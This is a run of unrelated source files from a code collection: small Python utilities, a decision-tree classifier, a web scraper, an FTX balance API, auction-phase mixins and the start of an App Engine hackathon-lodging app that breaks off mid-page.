Closing the select Q\n\t#-----------------------\n\tconn.commit()\n\tcursor.close()\n\tconn.close()\n\n\t#print('kassar: ' ,lagerbjor_packs_total)\n\t#print('Litrar: ',lagerbjor_Liter_total)\n\n\t#----------------------------------------------------------------------------\n\t# Check to see what is happening in the RUN\n\t#----------------------------------------------------------------------------\n\n\tif lagerbjor_alag_total == 0:\n\t\t#print(1) \n\t\treturn 0\n\telse:\n\t\tmedal_alag_a_kassa = lagerbjor_alag_total/lagerbjor_packs_total\n\t\t'''\n\t\tprint('Svo álagið er: {:.2f} per hreyfingu af itemNO : {} '.format(lagerbjor_alag_total/lagerbjor_count,item_nafn))\n\t\tprint('Heildarfjöldi pakka: {} .. Meðfjöldi kassa á Put RE línu: {:.2f} .. 
Meðal álag á kassa: {:.4f} '.format(lagerbjor_packs_total,(lagerbjor_packs_total/lagerbjor_count),medal_alag_a_kassa))\n\n\t\tprint('TOTAL ALAG: {} TOTAL PACKS : {}'.format(lagerbjor_alag_total,lagerbjor_packs_total))\n\t\t'''\n\t\tprint(medal_alag_a_kassa)\n\t\treturn medal_alag_a_kassa\n\t\t\n\n\n","sub_path":"ALAG_PER_ITEM/BOX/Alagsstudull.py","file_name":"Alagsstudull.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142665647","text":"import sys\n\nN = 6\nimport numpy as np\n\ndata = np.array([\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1]\n])\ndata_filter = np.array([[(0,0)]*(N+2)]*(N+2))\n#print(data_filter)\n\ndef preprocess():\n global data, data_filter\n for r in range(N, 0, -1):\n for c in range(N, 0, -1):\n cur_pix = data[r-1, c-1]\n data_filter[r,c][0] = (data_filter[r+1,c][0] + 1) if cur_pix==1 else 0\n data_filter[r,c][1] = (data_filter[r,c+1][1] + 1) if cur_pix==1 else 0\n print(data_filter)\n\ndef find_square():\n global N, data_filter\n max_area = -1\n max_pixs = []\n for r in range(1, N+1):\n for c in range(1, N+1):\n sq_size_max = min(data_filter[r,c][0], data_filter[r,c][1])\n print('sq_size_max={}'.format(sq_size_max))\n for sz in range(sq_size_max,0,-1):\n print('sz={}'.format(sz))\n if data_filter[r+sz-1,c][1] >= sz and data_filter[r,c+sz-1][0] >= sz:\n area = sz*sz\n print('max_area,area={}'.format(area))\n if max_area < area:\n print('RENEW: max_area,area={}'.format(area))\n max_area = area\n max_pixs = [(r,c)]\n break\n if max_area == area:\n max_pixs.append((r,c))\n break\n\n print('area,topleft={},{}'.format(max_area, max_pixs))\n\ndef doit():\n preprocess()\n find_square()\n\ndoit()\n\n","sub_path":"18/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"21846189","text":"import math\nimport itertools\nfrom backend import stock_api\nfrom args import make_args\n\nclass percent_change:\n def __init__(self):\n f = open('./backend/stocks.txt', 'r')\n self.stocks = {}\n self.tickers = f.read()\n self.args = make_args()\n\n def set_all_percent_change(self):\n # get close of prev day and curr price for all tickers\n api = stock_api.stock_api()\n closeOpenList = api.get_close_curr_ticker_list(self.tickers)\n\n for column in closeOpenList:\n close = closeOpenList.iloc[0][column]\n open = closeOpenList.iloc[1][column]\n\n # account for tickers that are passed as NULL from api\n if math.isnan(close) or math.isnan(open):\n continue\n\n # calculate percent change and round to 2 decimals\n self.stocks[column] = round(((open-close)/close)*100, 2)\n\n def set_stocks_to_decending_order(self):\n # sort by value (percent change)\n self.stocks = dict(sorted(self.stocks.items(), key=lambda item: item[1], reverse=True))\n return\n\n def get_stock_by_listSize(self):\n return dict(itertools.islice(self.stocks.items(), self.args.listSize))\n\n def get_highest_positive_movers(self):\n self.set_all_percent_change()\n self.set_stocks_to_decending_order()\n return self.get_stock_by_listSize()\n\n\n\n\n\n\n","sub_path":"backend/percent_change.py","file_name":"percent_change.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"325371693","text":"import data\n\ntraining_data = 
data.learning_data\n\nheader = ['color', 'shape', 'weight', 'size', 'name']\n\n\n# function that returns the set of unique values found in a column
def uniqie_vals(rows, col):\n    return set([row[col] for row in rows])\n\n\n# count how many rows of each class appear in the data set\ndef class_counts(rows):\n    counts = {}  # label -> count\n\n    for row in rows:\n        name = row[-1]\n        if name not in counts:\n            counts[name] = 0\n        counts[name] += 1\n    return counts\n\n\n# helper that checks whether a value is numeric\ndef is_numeric(val):\n    return isinstance(val, int) or isinstance(val, float)\n\n\n# a Question is asked at a tree node to partition the data set\nclass Question:\n    def __init__(self, column, value):\n        self.column = column\n        self.value = value\n\n    def match(self, example):\n        val = example[self.column]\n\n        if is_numeric(val):\n            return val >= self.value\n        else:\n            return val == self.value\n\n    def __repr__(self):\n        condition = '=='\n        if is_numeric(self.value):\n            condition = '>='\n        return \"Is %s %s %s?\" % (header[self.column], condition, str(self.value))\n\n\ndef partition(rows, question):\n    \"\"\" Partition a data set.\n    For each row, check whether it matches the question: if it does,\n    add it to 'true_rows', otherwise add it to 'false_rows'. \"\"\"\n    true_rows, false_rows = [], []\n    for row in rows:\n        if question.match(row):\n            true_rows.append(row)\n        else:\n            false_rows.append(row)\n    return true_rows, false_rows\n\n\ndef gini(rows):\n    \"\"\" Gini impurity measures how often a randomly chosen element of the set\n    would be mislabelled if it were labelled at random according to the\n    distribution of classes present in the set. \"\"\"\n\n    counts = class_counts(rows)\n    impurity = 0\n    for lbl in counts:\n        prob_of_lbl = counts[lbl] / float(len(rows))\n        impurity += prob_of_lbl * (1 - prob_of_lbl)\n    return impurity\n\n\ndef info_gain(left, right, current_uncertainty):\n    p = float(len(left)) / (len(left) + len(right))\n    return current_uncertainty - p * gini(left) - (1 - p) * gini(right)\n\n\ndef find_best_split(rows):\n    \"\"\" Find the best possible question to ask by checking every feature\n    and computing the 'info_gain' for each candidate split. \"\"\"\n    best_gain = 0\n    best_question = None\n    current_uncertainty = gini(rows)\n    n_features = len(rows[0]) - 1\n\n    for col in range(n_features):\n        values = set([row[col] for row in rows])\n\n        for val in values:\n            question = Question(col, val)\n\n            true_rows, false_rows = partition(rows, question)\n\n            if len(true_rows) == 0 or len(false_rows) == 0:\n                continue\n\n            gain = info_gain(true_rows, false_rows, current_uncertainty)\n\n            if gain > best_gain:\n                best_gain, best_question = gain, question\n\n    return best_gain, best_question\n\n\nclass Leaf:\n    def __init__(self, rows):\n        self.predicions = class_counts(rows)\n\n\nclass DecisionNode:\n    def __init__(self, question, true_branch, false_branch):\n        self.question = question\n        self.true_branch = true_branch\n        self.false_branch = false_branch\n\n\ndef build_tree(rows):\n    gain, question = find_best_split(rows)\n\n    if gain == 0:\n        return Leaf(rows)\n\n    true_rows, false_rows = partition(rows, question)\n\n    true_branch = build_tree(true_rows)\n\n    false_branch = build_tree(false_rows)\n\n    return DecisionNode(question, true_branch, false_branch)\n\n\ndef print_tree(node, spacing=\"\"):\n    if isinstance(node, Leaf):\n        print(spacing + \"Predict\", node.predicions)\n\n    else:\n        print(spacing + str(node.question))\n\n        print(spacing + '--> True:')\n        print_tree(node.true_branch, spacing + \"  \")\n\n        print(spacing + '--> False:')\n        
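# --- Editor's note (illustrative addition, not part of the original record): a worked
# example of the Gini impurity defined above, using assumed toy labels drawn from the
# candy names in this file's commented-out test data.
# For labels ['Kit-kat', 'Kit-kat', 'Wedel', 'Wedel'] each class has frequency 0.5,
# so gini = 0.5*(1-0.5) + 0.5*(1-0.5) = 0.5.
# For a pure node such as ['Wedel', 'Wedel'], gini = 1.0*(1-1.0) = 0.0, which is why
# info_gain() favours questions that separate the classes cleanly.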
print_tree(node.false_branch, spacing + \" \")\n\n\ndef classify(row, node):\n if isinstance(node, Leaf):\n return node.predicions\n\n if node.question.match(row):\n return classify(row, node.true_branch)\n else:\n return classify(row, node.false_branch)\n\n\ndef print_leaf(counts):\n probs = []\n for lbl in counts.keys():\n probs.append(lbl)\n return probs\n\n\n# my_tree = build_tree(training_data)\n#\n# print_tree(my_tree)\n#\n# testing_data = [\n# ['red', 'rectangle', 50, 'medium', 'Kit-kat'],\n# ['blue', 'rectangle', 115, 'big', 'Wedel'],\n# ['white', 'rectangle', 15, 'small', 'Krowka'],\n# ]\n#\n# test = ['white', 'rectangle', 15, 'small', 'Krowka']\n#\n# for row in testing_data:\n# print(print_leaf(classify(row, my_tree)))\n#\n# wynik = print_leaf(classify(test, my_tree))[0]\n# print(wynik)\n","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"218474679","text":"# -*- coding: utf-8 -*-\nimport logging\nimport sys\n\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom dateutil.tz import tzlocal\nfrom gevent import spawn, sleep\nfrom gevent.event import Event\nfrom itertools import chain\n\nfrom openprocurement.auction.utils import get_tender_data,\\\n sorting_by_amount, get_latest_bid_for_bidder\nfrom openprocurement.auction.worker.mixins import DBServiceMixin,\\\n PostAuctionServiceMixin\nfrom openprocurement.auction.worker.journal import\\\n AUCTION_WORKER_API_AUCTION_CANCEL,\\\n AUCTION_WORKER_API_AUCTION_NOT_EXIST,\\\n AUCTION_WORKER_API_AUCTION_RESULT_NOT_APPROVED as API_NOT_APPROVED,\\\n AUCTION_WORKER_SERVICE_END_FIRST_PAUSE\nfrom openprocurement.auction.insider import utils\nfrom openprocurement.auction.insider.constants import DUTCH,\\\n SEALEDBID, PREBESTBID, PRESEALEDBID, END, BESTBID, BIDS_KEYS_FOR_COPY\n\n\nLOGGER = logging.getLogger(\"Auction Worker Insider\")\n\n\nclass DutchDBServiceMixin(DBServiceMixin):\n \"\"\" Mixin class to work with couchdb\"\"\"\n def get_auction_info(self, prepare=False):\n # TODO: get bid info on login\n if not self.debug:\n if prepare:\n self._auction_data = get_tender_data(\n self.tender_url,\n request_id=self.request_id,\n session=self.session\n )\n else:\n self._auction_data = {'data': {}}\n\n auction_data = get_tender_data(\n self.tender_url + '/auction',\n user=self.worker_defaults[\"resource_api_token\"],\n request_id=self.request_id,\n session=self.session\n )\n\n if auction_data:\n self._auction_data['data'].update(auction_data['data'])\n self.startDate = self.convert_datetime(\n self._auction_data['data']['auctionPeriod']['startDate']\n )\n del auction_data\n else:\n self.get_auction_document()\n if self.auction_document:\n self.auction_document[\"current_stage\"] = -100\n self.save_auction_document()\n LOGGER.warning(\"Cancel auction: {}\".format(\n self.auction_doc_id\n ), extra={\"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": AUCTION_WORKER_API_AUCTION_CANCEL})\n else:\n LOGGER.error(\"Auction {} not exists\".format(\n self.auction_doc_id\n ), extra={\n \"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": AUCTION_WORKER_API_AUCTION_NOT_EXIST\n })\n self._end_auction_event.set()\n sys.exit(1)\n\n self.startDate = self.convert_datetime(\n self._auction_data['data']['auctionPeriod']['startDate']\n )\n\n def prepare_public_document(self):\n public_document = deepcopy(dict(self.auction_document))\n return public_document\n\n def 
prepare_auction_document(self):\n self.generate_request_id()\n public_document = self.get_auction_document()\n\n self.auction_document = {}\n if public_document:\n self.auction_document = {\"_rev\": public_document[\"_rev\"]}\n if self.debug:\n self.auction_document['mode'] = 'test'\n self.auction_document['test_auction_data'] = deepcopy(\n self._auction_data\n )\n\n self.get_auction_info(prepare=True)\n if self.worker_defaults.get('sandbox_mode', False):\n self.auction_document = utils.prepare_auction_document(self, fast_forward=True)\n else:\n self.auction_document = utils.prepare_auction_document(self)\n self.save_auction_document()\n\n\nclass DutchPostAuctionMixin(PostAuctionServiceMixin):\n\n def put_auction_data(self):\n if not self.debug:\n if self.worker_defaults.get('with_document_service', False):\n doc_id = self.upload_audit_file_with_document_service()\n else:\n doc_id = self.upload_audit_file_without_document_service()\n else:\n LOGGER.debug(\"Put auction data disabled\")\n\n results = utils.post_results_data(self)\n\n if results:\n bids_information = utils.announce_results_data(self, results)\n\n if not self.debug:\n if doc_id and bids_information:\n if self.worker_defaults.get('with_document_service', False):\n doc_id = self.upload_audit_file_with_document_service(\n doc_id\n )\n else:\n doc_id = self.upload_audit_file_without_document_service(\n doc_id\n )\n else:\n LOGGER.debug(\"Put auction data disabled\")\n return True\n else:\n LOGGER.info(\n \"Auctions results not approved\",\n extra={\n \"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": API_NOT_APPROVED\n }\n )\n\n def post_announce(self):\n self.generate_request_id()\n with utils.update_auction_document(self):\n utils.announce_results_data(self, None)\n\n\nclass DutchAuctionPhase(object):\n\n def next_stage(self, stage):\n\n with utils.lock_bids(self), utils.update_auction_document(self):\n run_time = utils.update_stage(self)\n stage_index = self.auction_document['current_stage']\n self.auction_document['stages'][stage_index - 1].update({\n 'passed': True\n })\n\n if stage['type'].startswith(DUTCH):\n LOGGER.info(\n '---------------- SWITCH DUTCH VALUE ----------------'\n )\n self.auction_document['stages'][stage_index]['time']\\\n = run_time\n if stage_index == 1:\n self.auction_document['current_phase'] = DUTCH\n self.audit['timeline'][DUTCH]['timeline']['start']\\\n = run_time\n\n old = self.auction_document['stages'][stage_index - 1].get(\n 'amount', ''\n ) or self.auction_document['initial_value']\n\n LOGGER.info('Switched dutch phase value from {} to {}'.format(\n old, stage['amount'])\n )\n turn = 'turn_{}'.format(stage_index)\n self.audit['timeline'][DUTCH][turn] = {\n 'amount': stage['amount'],\n 'time': run_time,\n }\n\n else:\n self.end_dutch()\n\n def approve_dutch_winner(self, bid):\n stage = self.auction_document['current_stage']\n try:\n winner_stage = self.auction_document['stages'][stage]\n\n bid['dutch_winner'] = True\n self.audit['timeline'][DUTCH]['bids'].append(bid)\n self._bids_data[bid['bidder_id']].append(bid)\n return deepcopy(bid)\n except Exception as e:\n LOGGER.warn(\"Unable to post dutch winner. 
Error: {}\".format(\n e\n ))\n return False\n\n def add_dutch_winner(self, bid):\n with utils.update_auction_document(self):\n LOGGER.info(\n '---------------- Adding dutch winner ----------------',\n extra={\n \"JOURNAL_REQUEST_ID\": self.request_id,\n \"MESSAGE_ID\": AUCTION_WORKER_SERVICE_END_FIRST_PAUSE\n }\n )\n try:\n bid = self.approve_dutch_winner(bid)\n if bid:\n bid['bidder_name'] = self.mapping[bid['bidder_id']]\n result = utils.prepare_results_stage(**bid)\n self.auction_document['stages'][self.auction_document['current_stage']].update(\n result\n )\n self.auction_document['results'].append(\n result\n )\n LOGGER.info('Approved dutch winner')\n self.end_dutch()\n return True\n except Exception as e:\n LOGGER.fatal(\n \"Exception during initialization dutch winner. \"\n \"Error: {}\".format(e)\n )\n return e\n\n def end_dutch(self, stage=\"\"):\n LOGGER.info(\n '---------------- End dutch phase ----------------',\n )\n self.audit['timeline'][DUTCH]['timeline']['end']\\\n = datetime.now(tzlocal()).isoformat()\n stage_index = self.auction_document['current_stage']\n if self.auction_document['stages'][stage_index]['type'].startswith('dutch'):\n self.auction_document['stages'][stage_index].update({\n 'passed': True\n })\n\n spawn(self.clean_up_preplanned_jobs)\n if not self.auction_document['results']:\n LOGGER.info(\"No bids on dutch phase. End auction now.\")\n self.end_auction()\n return\n self.auction_document['current_phase'] = PRESEALEDBID\n for index, stage in enumerate(self.auction_document['stages']):\n if stage['type'] == 'pre-sealedbid':\n self.auction_document['current_stage'] = index\n break\n\n\nclass SealedBidAuctionPhase(object):\n\n def add_bid(self):\n LOGGER.info(\"Started bids worker\")\n while True:\n if self.bids_queue.empty() and self._end_sealedbid.is_set():\n break\n bid = self.bids_queue.get()\n if bid:\n LOGGER.info(\n \"Adding bid {bidder_id} with value {amount}\"\n \" on {time}\".format(**bid)\n )\n if bid['amount'] == -1:\n LOGGER.info(\n \"Bid {bidder_id} marked for cancellation\"\n \" on {time}\".format(**bid)\n )\n self._bids_data[bid['bidder_id']].append(bid)\n self.audit['timeline'][SEALEDBID]['bids'].append(bid)\n sleep(0.1)\n LOGGER.info(\"Bids queue done. Breaking woker\")\n\n def switch_to_sealedbid(self, stage):\n with utils.lock_bids(self), utils.update_auction_document(self):\n self._end_sealedbid = Event()\n run_time = utils.update_stage(self)\n self.auction_document['current_phase'] = SEALEDBID\n self.audit['timeline'][SEALEDBID]['timeline']['start'] =\\\n run_time\n spawn(self.add_bid)\n LOGGER.info(\"Swithed auction to {} phase\".format(SEALEDBID))\n\n def approve_audit_info_on_sealedbid(self, run_time):\n self.audit['timeline'][SEALEDBID]['timeline']['end']\\\n = run_time\n\n def end_sealedbid(self, stage):\n with utils.update_auction_document(self):\n\n self._end_sealedbid.set()\n while not self.bids_queue.empty():\n LOGGER.info(\n \"Waiting for bids to process\"\n )\n sleep(0.1)\n LOGGER.info(\"Done processing bids queue\")\n if len(self._bids_data.keys()) < 2:\n LOGGER.info(\"No bids on sealedbid phase. 
end auction\")\n self.end_auction()\n return\n\n all_bids = deepcopy(self._bids_data)\n minimal_bids = []\n max_bid = {'amount': 0} # init sealedbid winner bid\n for bid_id in all_bids.keys():\n bid = get_latest_bid_for_bidder(all_bids[bid_id], bid_id)\n bid['bidder_name'] = self.mapping[bid['bidder_id']]\n minimal_bids.append(\n utils.prepare_results_stage(**bid)\n )\n # find a winner\n max_bid = max([max_bid, bid], key=lambda bid: bid['amount'])\n minimal_bids = sorting_by_amount(minimal_bids)\n self.auction_document['results'] = minimal_bids\n # save winner to stages in auction_document\n max_bid['sealedbid_winner'] = True\n self.auction_document['stages'][self.auction_document['current_stage']].update(\n utils.prepare_results_stage(**max_bid)\n )\n run_time = utils.update_stage(self)\n self.approve_audit_info_on_sealedbid(run_time)\n self.auction_document['current_phase'] = PREBESTBID\n\n\nclass BestBidAuctionPhase(object):\n\n def approve_bid_on_bestbid(self, bid):\n if bid:\n LOGGER.info(\n \"Updating dutch winner {bidder_id} with value {amount}\"\n \" on {time}\".format(**bid)\n )\n bid['dutch_winner'] = True\n self._bids_data[bid['bidder_id']].append(bid)\n self.audit['timeline'][BESTBID]['bids'].append(bid)\n return True\n return False\n\n def approve_audit_info_on_bestbid(self, run_time):\n self.audit['timeline'][BESTBID]['timeline']['end'] = run_time\n\n def add_bestbid(self, bid):\n try:\n if self.approve_bid_on_bestbid(bid):\n LOGGER.info(\n \"Dutch winner id={bidder_id} placed bid {amount}\"\n \" on {time}\".format(**bid)\n )\n return True\n except Exception as e:\n LOGGER.info(\n \"Falied to update dutch winner. Error: {}\".format(\n e\n )\n )\n return e\n return False\n\n def switch_to_bestbid(self, stage):\n with utils.lock_bids(self), utils.update_auction_document(self):\n self.auction_document['current_phase'] = BESTBID\n run_time = utils.update_stage(self)\n self.audit['timeline'][BESTBID]['timeline']['start'] = run_time\n\n def end_bestbid(self, stage):\n with utils.update_auction_document(self):\n\n all_bids = deepcopy(self._bids_data)\n minimal_bids = []\n\n for bid_id in all_bids.keys():\n bid = get_latest_bid_for_bidder(all_bids[bid_id], bid_id)\n bid['bidder_name'] = self.mapping[bid['bidder_id']]\n minimal_bids.append(\n utils.prepare_results_stage(**bid)\n )\n minimal_bids = sorting_by_amount(minimal_bids)\n\n self.auction_document['results'] = minimal_bids\n run_time = utils.update_stage(self)\n self.approve_audit_info_on_bestbid(run_time)\n self.end_auction()\n","sub_path":"openprocurement/auction/insider/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":14789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"476997691","text":"import urllib.request\nimport urllib.parse\nimport re\n\n\ndef get_ganres_list():\n \"\"\"\n @brief get list of ganres from kinopoisk.ru\n\n @return The ganres list.\n \"\"\"\n with urllib.request.urlopen('https://www.kinopoisk.ru/top/lists/') as f:\n text = f.read().decode(\"utf8\")\n start = text.index(\"list_main js-rum-hero\")\n stop = text.index(r'', start)\n text = text[start + 28:stop]\n text = re.sub(r'\\ *<[/]*li.*\\n', '', text)\n text = re.sub(r'\\ *]*>', '', text).split(r'')\n ar = []\n for el in text:\n i = el.find('>')\n ar.append((el[10:i - 1], el[i + 1:-4]))\n\n return ar\n\nsort_type = { \n \"по порядку\" : \"order\",\n \"по году\" : \"year\",\n \"по названию\" : \"name\",\n \"по оригинальному названию\" : \"oname\",\n \"по рейтингу КиноПоиска\" 
: \"rating\",\n \"по рейтингу IMDb\" : \"rating_imdb\",\n \"по количеству оценок\" : \"votes\",\n \"по времени\" : \"runtime\"\n } \n\ndata = {\n \"level\": \"60\",\n \"list\": \"5\",\n \"_filtr\": \"all\",\n \"_sort\": sort_type[\"по порядку\"],\n \"page\": 2,\n \"_ord\": \"\"\n }\n\n \n\n\ndata = urllib.parse.urlencode(data).encode()\nreq = urllib.request.Request('https://www.kinopoisk.ru/top/lists/5/page/2', data, method=\"POST\")\n\nwith urllib.request.urlopen(req) as f:\n text = f.read().decode(\"utf8\")\n start = text.index(\"table id=\\\"itemList\")\n stop = text.index('/table', start)\n text = text[start: stop]\n print(text)\n","sub_path":"url_example.py","file_name":"url_example.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"552452485","text":"# In this program we are implementing the palindrome number\nnum=int(input(\"Enter a number:\"))\ntemp=num\nrev=0\n\nwhile(num>0):\n digit=num%10\n rev= rev*10+digit #storing the reversed number\n num //=10\n\nif(temp==rev):\n print(\"The number is palindrome!\")\nelse:\n print(\"Not a palindrome!\")","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"78310136","text":"from typing import List\n\n\nclass Solution:\n # swap\n #https://leetcode-cn.com/problems/shu-zu-zhong-zhong-fu-de-shu-zi-lcof/solution/jian-zhi-offer-mian-shi-ti-jing-xuan-tu-jie-03-shu/\n def findRepeatNumber(self, nums: List[int]) -> int:\n if not nums:\n return -1\n i = 0\n while i < len(nums):\n if nums[i] == i:\n i += 1\n continue\n if nums[nums[i]] == nums[i]: #索引 nums[i] 处的值也为 nums[i],即找到一组相同值,返回 nums[i] 即可\n return nums[i]\n nums[nums[i]], nums[i] = nums[i], nums[nums[i]]\n i += 1\n return -1\n def findRepeatNumber2(self, nums: List[int]) -> int:\n if not nums:\n return\n seen = set()\n for num in nums:\n if num in seen:\n break\n else:\n seen.add(num)\n return num\n\nsolution = Solution()\nprint(solution.findRepeatNumber([2, 3, 1, 0, 2, 5, 3]))","sub_path":"Offer/Offer3-findRepeatNumber.py","file_name":"Offer3-findRepeatNumber.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293734731","text":"from ftx_client import FtxClient\nfrom fastapi import FastAPI\nfrom config import settings\n\napp = FastAPI()\n\napi_key = settings.api_key\napi_secret = settings.api_secret\n\n@app.get(\"/\")\ndef read_root():\n subaccounts = FtxClient(api_key=api_key, api_secret=api_secret).get_subaccounts();\n account_names = [''] + [s['nickname'] for s in subaccounts]\n\n accounts = []\n\n for name in account_names:\n payments = FtxClient(api_key=api_key, api_secret=api_secret,\n subaccount_name=name).get_funding_payments()\n accounts.append({\"name\": name, \"payments\": payments[:48]})\n\n all_balances = FtxClient(api_key=api_key, api_secret=api_secret).get_all_balances()\n\n all_usd_value = sum(\n balance['usdValue']\n for account_balances in all_balances.values()\n for balance in account_balances\n )\n return {\"accounts\": accounts, \"total\": all_usd_value}\n","sub_path":"ftx-api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160371820","text":"import cgi\nimport urllib\n\nfrom google.appengine.api import 
users\nfrom google.appengine.ext import ndb\n\nfrom lxml import html\nimport requests\n\nimport datetime\n\nfrom time import gmtime, strftime, strptime\n\nimport webapp2\n\nHEAD_STRING=\"\"\"\n\n\n\n\"\"\"\n\nINTRO = '''
\n
\n

a restful service

\n
\n \n\n\n

\n sleephacks is a web service that connects travelling Hackathon hackers with local residents in order to supply them with accommodation during the event.\n
\n
Make your hackathon sleep experience less like this
\n

And more like this
\n
\n Ever wanted a real bed, a warm shower, or a safe place to store your valuables while at a hackathon? Use sleephacks so you can relax, enjoy your hackathon, and focus on the code!\n

\n
\n
\n
\n'''\n\nHOMEPAGE='''\n\n\n \n \n \n \n \n sleephacks - Home\n\n \n \n\t\n\t\n\t\n \n \n \n \n \n
\n\t\t\t

\n\t\t\t\tsleephacks\n\t\t\t

\n\t\t
\n\t
\n\t\t
\n\t
\n\t
\n\t\t

\n %s\n
\n %s\n\t\t

\n\t
\n\n%s\n\n\t\n \n \n \n \n \n\n\n'''\n\n\nMAIN_PAGE_FOOTER_TEMPLATE = \"\"\"\\\n\n

Host a Hacker

\n\n
\n

Message

\n
\n
\n
\n

Which genders are you willing to accommodate?

\n All\n
\n Male\n
\n Female\n
\n Other (specify in message)\n
\n
\n

Will you charge hackers to stay with you?

\n Yes\n
\n No\n

\n
\n
\n\n\n\"\"\"\n\n\n\nDEFAULT_HACKATHON_NAME = 'default_hackathon'\n\n# We set a parent key on the 'Availabilitys' to ensure that they are all\n# in the same entity group. Queries across the single entity group\n# will be consistent. However, the write rate should be limited to\n# ~1/second.\n\n\n\ndef hackathon_key(hackathon_name=DEFAULT_HACKATHON_NAME):\n \"\"\"Constructs a Datastore key for an Availability entity.\n\n We use hackathon_name as the key.\n \"\"\"\n return ndb.Key('Availability', hackathon_name)\n\nclass Attendee(ndb.Model):\n \"\"\"Sub model for representing an author.\"\"\"\n identity = ndb.StringProperty(indexed=False)\n name = ndb.StringProperty(indexed=False)\n email = ndb.StringProperty(indexed=True)\n rating = ndb.IntegerProperty(indexed=True)\n\n\nclass Availability(ndb.Model):\n \"\"\"A main model for representing an individual ContentEngine entry.\"\"\"\n attendee = ndb.StructuredProperty(Attendee)\n content = ndb.StringProperty(indexed=False)\n cost = ndb.StringProperty(indexed=True)\n gender = ndb.StringProperty(indexed=True)\n uID = ndb.StringProperty(indexed=True)\n deleted = ndb.BooleanProperty(indexed=True)\n #date = ndb.DateTimeProperty(auto_now_add=True)\n\n\n#class TestPage(webapp2.RequestHandler):\n# def get(self):\n# page = requests.get('http://mlh.io/seasons/f2015/events')\n# tree = html.fromstring(page.text)\n# events = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/h3/text()')\n# logos = tree.xpath('//div[@class=\"event-logo\"]/img/@src')\n# datesLongList = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/p/text()')\n#\n# dates = []\n#\n# for i in xrange(0,len(datesLongList),2):\n# dates.append(datesLongList[i])\n#\n# self.response.write(dates)\n\n##UPDATED\nclass HackathonPage(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n #self.redirect('/login')\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n self.response.write('''\n \t\n \t\t\n \t\t\n \t\tsleephacks - Pick your Hackathon\n\n \t\t\n \t\t\n \t\t\n \t\t\n \t\t\n \t\n \t\n \t\t
\n \t\t\t\n \t\t\t\n \t\t\t\n \t\t\t

\n \t\t\t\tsleephacks - Hackathons\n \t\t\t

\n\n \t\t\t\n \t\t\t\t'''+url_linktext+'''\n \t\t\t\n My Listings\n \t\t
\n \t\t\n \t\t\n\n \t\t
\n \n \n \t\t\t\t''')\n\n page = requests.get('http://mlh.io/seasons/f2015/events')\n tree = html.fromstring(page.text)\n events = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/h3/text()')\n logos = tree.xpath('//div[@class=\"event-logo\"]/img/@src')\n\n datesLongList = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/p/text()')\n\n dates = []\n\n for i in xrange(0,len(datesLongList),2):\n dates.append(datesLongList[i])\n\n\n i = 0\n dictMonths = {'January':0,'February':31,'March':59,'April':90,'May':120,'June':151,'July':181,'August':212,'September':243,'October':273,'November':304,'December':334}\n for date,event,logo in zip(dates,events,logos):\n sections = date.split(\" \")\n dateStart = sections[1]\n daysPassed = dictMonths[sections[0]]\n daysStart = daysPassed + int(dateStart[:len(dateStart)-2])\n daysCurrent = dictMonths[datetime.datetime.now().strftime(\"%B\")] + int(datetime.datetime.now().strftime(\"%d\"))\n daysToEvent = daysStart - daysCurrent\n if (daysToEvent <= 21 and daysToEvent >= 0):\n i += 1\n self.response.write(\"\")\n if (i == 3):\n self.response.write(\"\")\n i = 0\n self.response.write(\"\")\n self.response.write(\"\")\n\nclass UserDashboard(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n\n extra_text = \"\"\n\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n extra_text = \"Please Log In to view your listings\"\n\n\n availabilities_query = Availability.query()#.order(-Availability.date)\n avail_filter = availabilities_query.filter(Availability.attendee.email==user.email()).filter(Availability.deleted==False)\n availabilities = avail_filter.fetch()\n\n self.response.write('''\n \n \n \n \n sleephacks - accomodation\n\n \n \n \n \n \n \n \t\n \n
\n \t \n
\n
\n
